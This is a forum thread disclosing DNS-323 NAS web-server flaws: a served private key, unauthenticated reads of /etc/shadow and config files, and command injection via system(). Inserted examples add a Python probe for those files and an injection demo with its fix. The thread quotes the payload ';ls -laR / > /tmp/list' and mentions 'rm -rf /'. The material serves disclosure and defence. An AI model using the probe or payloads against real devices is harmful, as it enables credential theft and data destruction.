I don't know if this is a new feature or not, but I just today discovered port 443 being open on my DNS-323. That being so, I went to test it and surprisingly got the web interface (like on port 80).
That gave me a first idea: how could one disable port 80 (so one would be forced to use HTTPS to configure the device)?
Next observation: going to http://dns-323/server.pem revealed the private key. Isn't this a huge security glitch?
Interesting...
I've no fun_plug installed, or any other software, on my NAS and I found the same thing.
Last edited by Minglarn (2008-05-27 00:06:17)
That's interesting - I wonder if your private key is the same as my private key - now that would be a huge security glitch.
The keys and certificates are generated by the webs executable using these commands:
webs:/web/openssl req -x509 -newkey rsa:2048 -days 1024 -keyout /web/server-key.pem -out /web/server-cert.pem
webs:/web/openssl rsa -in /web/server-key.pem -out /web/server-key-nopassword.pem
webs:cat /web/server-key-nopassword.pem /web/server-cert.pem > /web/server.pem
webs:mv /web/server-cert.pem /web/cacert.pem
webs:mv /web/server-key.pem /web/cakey.pem
So the keys are generated randomly (they will not be the same), but by knowing your private key and capturing the TLS handshake a skilled attacker could decode all subsequent data, or am I missing something?
OK lol, check this shit out:
http://dns-323/mnt/HD_a2/fun_plug
You can read ANY file on the disks, as webs runs as root.
OMG!
Discovered that a while ago. I posted something about it, but only relating to opening any of the web pages without actually having to log in. Anyway, don't be too surprised, this is a SOHO device that really is not intended for great security. Just think how big of a security issue the fun_plug is in itself.
Try stopping the webs service and restarting it as something other than root. See if it works, or just turn it off unless you need it.
http://dns323.kood.org/forum/p15627-200 … tml#p15627
Last edited by bq041 (2008-05-27 07:05:16)
bq041 wrote:
Anyway, don't be too surprised, this is a SOHO device that really is not intended for great security. Just think how big of a security issue the fun_plug is in itself.
Great security? There is no security with webs, none at all. And most of all, IMO, being a SOHO device does not let D-Link forget and go against all security principles. Let's take a look at routers. They are mostly SOHO devices too (and by default not opened from the outside) and yet you don't see people shutting them off, reading configuration pages and passwords from them without any authentication.
http://dns-323/etc/shadow
http://dns-323/etc/ez-ipupdate.conf
http://dns-323/mnt/USB/ffp/start/mlnet.sh
(if you use shadowandy's extended script, the password's in there)
By shutting down webs one could partially solve the problem, but then again we lose some of the functionality (NTP is the one I can think of right now)...
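The unauthenticated file reads listed in this post and earlier in the thread (server.pem, /etc/shadow, the ez-ipupdate config, anything under /mnt), as an added example that is not part of the original posts: a small Python probe that requests each of those paths from the NAS with no credentials, reports which ones webs answers with HTTP 200, and flags the two findings that matter most, a PEM bundle that carries a PRIVATE KEY block (which is exactly what the cat of server-key-nopassword.pem and server-cert.pem above produces) and a shadow file with real hashes in it. The hostname dns-323 and the path list are taken from the thread; the fetch function is injectable so the classification logic can be exercised offline on constructed responses.

```python
"""Probe a DNS-323-style webs server for files it serves without a login."""
import re
import sys
import urllib.error
import urllib.request

# Paths this thread reports as readable through webs with no authentication.
SENSITIVE_PATHS = [
    "/server.pem",                  # TLS certificate plus the unencrypted private key
    "/etc/shadow",                  # account password hashes
    "/etc/ez-ipupdate.conf",        # dynamic DNS credentials
    "/mnt/HD_a2/fun_plug",          # proves the data disks themselves are reachable
    "/mnt/USB/ffp/start/mlnet.sh",  # may hold a password with the extended script
]

PEM_HEADER = re.compile(r"^-----BEGIN ([A-Z0-9 ]+?)-----$", re.M)


def pem_block_types(body):
    """Names of the PEM blocks in body, in order, e.g. ['RSA PRIVATE KEY', 'CERTIFICATE']."""
    return PEM_HEADER.findall(body)


def exposes_private_key(body):
    """True if body carries any kind of PEM private key (RSA, EC, PKCS#8 ...)."""
    return any(t.endswith("PRIVATE KEY") for t in pem_block_types(body))


def shadow_has_hashes(body):
    """True if any shadow line has a real hash rather than a locked/empty field."""
    for line in body.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] not in ("", "*", "!", "!!", "x"):
            return True
    return False


def http_get(url, timeout=5):
    """Fetch url with no credentials; return (status, body), or (None, '') on error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def describe(path, body):
    """Turn a readable body into a one-line finding."""
    if path.endswith(".pem"):
        if exposes_private_key(body):
            return "readable, private key exposed: " + ", ".join(pem_block_types(body))
        return "readable, certificate only"
    if path == "/etc/shadow":
        return "readable, password hashes present" if shadow_has_hashes(body) else "readable"
    return "readable"


def probe(host, fetch=http_get, paths=SENSITIVE_PATHS):
    """Map each path the server answers with HTTP 200 to a finding string.

    fetch(url) -> (status, body) is injectable so the logic runs offline in tests.
    """
    findings = {}
    for path in paths:
        status, body = fetch("http://%s%s" % (host, path))
        if status == 200:
            findings[path] = describe(path, body)
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "dns-323"
    for path, finding in probe(target).items():
        print("%-32s %s" % (path, finding))
```

Run it from a machine on the same LAN as the NAS. A 200 for /etc/shadow is the finding on its own; whether the hashes crack is a separate question. The request goes to port 80 only, which is the port the thread shows; the same GET against port 443 would answer the question of whether the HTTPS listener has the same behaviour.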
Be honest, how many users not on this forum, who bought this unit to back up their files, are ever going to try this? Few if not none. Heck, most users who use wireless at home just open the box, plug it in and go without doing any setup (at least until recently).
I don't disagree that this device has some major security flaws in it. It just seems that everybody is shocked when somebody discovers one. I would think everyone would be used to it by now. Yes, there are a lot of security issues, but it is a low cost device designed for a majority of users who would probably never think to try this. At this point, I have become quite accustomed to D-Link cutting corners.
A SOHO device at this price is never going to have top-of-the-line security. More expensive units do have better security, but once again, at a price most SOHO users are not willing to pay.
Attaching the DNS-323 to a SOHO router is usually sufficient for 99% of users out there. And those who are concerned with security should look for other devices in a different price range.
I guess we have different views on security. In my opinion security should be the first thing to look out for on these devices, no matter if it's SOHO or not or if it costs 100 or 1000..
And the fact is that it's a software problem; webs could be a billion times more secure with a proper implementation and no additional costs..
You set it all up, add some users, assign a few groups, thinking you're all secure and everything. But when Mr. Naughty breaks into your wifi network, configuration files are read, passwords are stolen and possibly, because of that, the data is erased (it can be way worse than just data deletion). What to think: "oh well, it's a SOHO device, better luck next time when you spend more money!" Bullcrap.
Last edited by SilentException (2008-05-27 23:49:46)
SilentException wrote:
I guess we have different views on security. In my opinion security should be the first thing to look out for on these devices, no matter if it's SOHO or not or if it costs 100 or 1000..
And the fact is that it's a software problem; webs could be a billion times more secure with a proper implementation and no additional costs..
You set it all up, add some users, assign a few groups, thinking you're all secure and everything. But when Mr. Naughty breaks into your wifi network, configuration files are read, passwords are stolen and possibly, because of that, the data is erased (it can be way worse than just data deletion). What to think: "oh well, it's a SOHO device, better luck next time when you spend more money!" Bullcrap.
If it cost 1000 would you have bought it?
The nice thing about this device is it's open source, if it doesn't work the way you want it to, you have the GPL sources and you can fix it.
SilentException wrote:
You set it all up, add some users, assign a few groups, thinking you're all secure and everything. But when Mr. Naughty breaks into your wifi network, configuration files are read, passwords are stolen and possibly, because of that, the data is erased (it can be way worse than just data deletion). What to think: "oh well, it's a SOHO device, better luck next time when you spend more money!" Bullcrap.
Just to play the devil's advocate here, if security is such a big issue, then why are you running a wifi that Mr. Naughty can break into? Besides, in your scenario, only someone who knows this system would be able to exploit it anyway. As you showed in your examples, you have to type in each thing you want specifically; you can't just get a directory listing.
Going along your same line of thinking, an FTP server should never have been put on the device. Everyone knows how insecure FTP is. Besides, if you have a hacker that is good enough to break into a well set-up wifi, then there are all sorts of other avenues the person can take to access your DNS without exploiting the web vulnerability.
I'm just saying security should not be overlooked, never ever. That's all.
bq, I took your example as the base for the wireless attack:
Heck, most users who use wireless at home just open the box, plug it in and go without doing any setup (at least until recently).
Do you think this kind of user uses WPA and/or strong passwords too?
BTW, FTP is an insecure protocol, but the implementation in the DNS-323 is secure (well, it's not secure because of the webs server, from which you could read config and passwd files).
fordem: sure it can be fixed, but why do their job :p
Besides, one could also say that Windows Home (or any other) is a SOHO OS, and yet you don't see MS leaving holes all around, but patching them. And here, in the 5 firmware revisions *nothing* has been done to secure the web interface, and that's what bugs me the most.
More "sugar" at the end: what about executing commands? I discovered that data from some input fields on the web interface was used in system() calls. After bypassing the JavaScript checks (lol), entering for example ";ls -laR / > /tmp/list" would be enough to get the complete directory listing. Now what would rm -rf / do, I wonder?
Last edited by SilentException (2008-05-28 02:48:09)
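The system() issue in the post above, as an added example that is not part of the original post. The thread does not name the input field or the binary that the field reaches, so an NTP server field is assumed here (NTP is the one webs function named earlier in the thread) and `echo` stands in for the real tool so that the demonstration is harmless; both are assumptions of this example. The first function models the firmware's pattern, a command string built from the field value and handed to /bin/sh -c, which is what system() does, so the thread's ";ls -laR / > /tmp/list" payload becomes a second command. The second shows that calling the tool with an argv list keeps the value one literal argument. The third adds the server-side validation that the bypassable JavaScript check was standing in for.

```python
"""Command injection through system() and the argv-plus-validation fix.

Illustrative model of the pattern reported for the DNS-323 web interface;
the field, command and policy below are assumptions, not the firmware's code.
"""
import re
import subprocess

# Policy for an assumed NTP-server field: a hostname or dotted IPv4 address and
# nothing else. Anything a shell could interpret (; | > & $ space) is excluded.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def valid_hostname(value):
    """Server-side check. A browser-side JavaScript check proves nothing,
    since the request can be sent without the page's script ever running."""
    return bool(HOSTNAME.match(value))


def run_vulnerable(tool, value):
    """Models system("<tool> server <value>"): /bin/sh -c parses the whole
    string, so ';', '|', '>' inside value become shell syntax, not data."""
    cmd = "%s server %s" % (tool, value)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(tool, value):
    """No shell involved: value reaches the tool as a single literal argument."""
    return subprocess.run([tool, "server", value], capture_output=True, text=True).stdout


def run_hardened(tool, value):
    """Validate, then call without a shell. The argv call alone stops this
    payload; the validation also stops values the tool itself might misread."""
    if not valid_hostname(value):
        raise ValueError("rejected NTP server value: %r" % value)
    return run_argv(tool, value)


if __name__ == "__main__":
    payload = ";echo INJECTED"  # harmless stand-in for ';ls -laR / > /tmp/list'
    print("vulnerable:", repr(run_vulnerable("echo", payload)))
    print("argv only: ", repr(run_argv("echo", payload)))
    try:
        run_hardened("echo", payload)
    except ValueError as err:
        print("hardened:  ", err)
    print("hardened:  ", repr(run_hardened("echo", "pool.ntp.org")))
```

The vulnerable call prints the injected marker on its own line because the shell ran two commands; the argv call prints the payload back verbatim as part of the one argument. On the device the equivalent of the argv path in C is fork() plus execv() with a fixed argument vector instead of system().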
SilentException wrote:
I'm just saying security should not be overlooked, never ever. That's all.
bq, I took your example as the base for the wireless attack: Heck, most users who use wireless at home just open the box, plug it in and go without doing any setup (at least until recently).
Do you think this kind of user uses WPA and/or strong passwords too?
BTW, FTP is an insecure protocol, but the implementation in the DNS-323 is secure (well, it's not secure because of the webs server, from which you could read config and passwd files).
fordem: sure it can be fixed, but why do their job :p
Besides, one could also say that Windows Home (or any other) is a SOHO OS, and yet you don't see MS leaving holes all around, but patching them. And here, in the 5 firmware revisions *nothing* has been done to secure the web interface, and that's what bugs me the most.
More "sugar" at the end: what about executing commands? I discovered that data from some input fields on the web interface was used in system() calls. After bypassing the JavaScript checks (lol), entering for example ";ls -laR / > /tmp/list" would be enough to get the complete directory listing. Now what would rm -rf / do, I wonder?
Just to clarify, you're comparing a low-end NAS with a high-end device. For example, would you expect a "no-name" free-after-rebate router to perform the same as, let's say, a high-end Cisco router? Probably not, since those are two devices for two different purposes.
Same story here: the DNS-323 is targeted at people with a simple network at home who need external storage. What we're doing on this forum is trying to make this "low-end" device into a mid-range one by modifying the source code and/or adding additional scripts for more functionality. However, nobody expects the DNS-323 to perform as a high-end device.
I can certainly see your concerns about security and they're all valid. But the truth is that most users don't care about secure FTP or VPN; they need a simple setup that they can use without reading books on security, security keys and such. At sub $200, D-Link's DNS-323 meets those customers.
In your case, if you do require better security for your application, then most probably the DNS-323 is not for you and you'd need to get a different NAS with better security and more features.
Last edited by andrey (2008-05-28 23:28:01)
SilentException wrote:
I'm just saying security should not be overlooked, never ever. That's all.
You should raise these concerns on the Official D-Link forum http://forums.dlink.com
Perhaps someone at D-Link will appreciate the significance of these security oversights
andrey wrote:
Just to clarify, you're comparing a low-end NAS with a high-end device. For example, would you expect a "no-name" free-after-rebate router to perform the same as, let's say, a high-end Cisco router? Probably not, since those are two devices for two different purposes.
Same story here: the DNS-323 is targeted at people with a simple network at home who need external storage. What we're doing on this forum is trying to make this "low-end" device into a mid-range one by modifying the source code and/or adding additional scripts for more functionality. However, nobody expects the DNS-323 to perform as a high-end device.
I can certainly see your concerns about security and they're all valid. But the truth is that most users don't care about secure FTP or VPN; they need a simple setup that they can use without reading books on security, security keys and such. At sub $200, D-Link's DNS-323 meets those customers.
In your case, if you do require better security for your application, then most probably the DNS-323 is not for you and you'd need to get a different NAS with better security and more features.
No mate, I certainly am not comparing the DNS-323 with a high-end device and I do not expect it to perform like one. Where did you read this? FEATURES != PERFORMANCE != SECURITY.
And the security oversights *should* be fixed in low-end as in high-end devices (no matter what the price is or who the targeted customers are). That's all.
Don't get me wrong, I love this NAS and all the hacks and mods. Should get another one soon.
And I'll be shutting down webs for now, but it's not a solution, it's just a quick "hack".
migs wrote:
You should raise these concerns on the Official D-Link forum http://forums.dlink.com
Perhaps someone at D-Link will appreciate the significance of these security oversights
Maybe I'll point them to this thread. Thanks for the tip.
SilentException wrote:
Maybe I'll point them to this thread. Thanks for the tip.
You should post this issue to their board; I'm afraid this "hacker" site is not acknowledged by D-Link.
I reported the issue to Conceptronic last week and just got a response that they'll look into it. Nothing specific so far though.
Nice to see someone cares.
mig wrote:
SilentException wrote:
Maybe I'll point them to this thread. Thanks for the tip.
You should post this issue to their board; I'm afraid this "hacker" site is not acknowledged by D-Link.
Let's just say that although it may not be acknowledged by D-Link, they do monitor it quite closely.
Some of the excuses for not expecting security from "low-end" devices are interesting; imagine if Vista Home Basic had an identified security bug that allowed access to any file on the system from within a LAN and MSFT didn't issue a hotfix within a few days. After all, Vista Home Basic costs less than $100 dollars... most home users probably don't mind sharing all of their files within their LAN anyway, right?
High-end devices are expected to have fancy and robust features, but even low-end devices need to achieve some basic level of functionality, particularly in the area of security. With a hole like this one, all of the user permission features of the DNS-323 are worthless, since it doesn't actually provide user-level security at all. FTP at least can be disabled via supported mechanisms. A security bug like this should either warrant a very fast patch or a revocation of the impacted firmware version until a fixed version can be released.
-Jeff
It's also interesting that people are willing to argue the merits of the DNS-323's security with fellow hackers on this site; however, no one has raised this issue on the official D-Link forum.
Until the security flaw is posted to the official D-Link forum, D-Link has plausible deniability of the issue, and all our speculation about what is expected of the DNS-323 in regards to security is just... well, speculation.
Hm, what is the official D-Link forum? forum.d-link.de? I don't speak German, unfortunately..
SilentException wrote:
Hm, what is the official D-Link forum?
http://forum.dlink.com You must first register to view topics.
Naoki wrote:
SilentException wrote:
Hm, what is the official D-Link forum?
http://forum.dlink.com You must first register to view topics.
Yeah, I was there earlier but there were no forums to see.. after registration it was OK.
Anyhow, I posted it there now too..